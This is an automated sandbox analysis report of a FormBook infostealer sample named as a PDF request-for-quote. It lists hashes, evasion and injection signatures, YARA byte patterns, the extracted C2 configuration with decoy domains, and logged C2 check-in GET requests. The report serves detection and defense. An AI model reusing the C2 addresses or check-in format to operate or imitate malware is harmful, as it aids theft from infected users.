Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report RFQ_AP65425652_032421 isu-isu,pdf.exe

Overview

General Information

Sample Name:RFQ_AP65425652_032421 isu-isu,pdf.exe
Analysis ID:383968
MD5:98f9ea244308bb5969ea3c302c32efcd
SHA1:82a913894418af7834d23bc543eb286230d4edf4
SHA256:cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6788 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
    • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6316 cmdline: /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dllReversingLabs: Detection: 22%
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeVirustotal: Detection: 35%Perma Link
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeJoe Sandbox ML: detected
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.4ca7960.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.a0a460.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004026BC FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.luegomusic.com/pe0r/
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.1364kensington.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:22:07 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: http://business.google.com/
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/
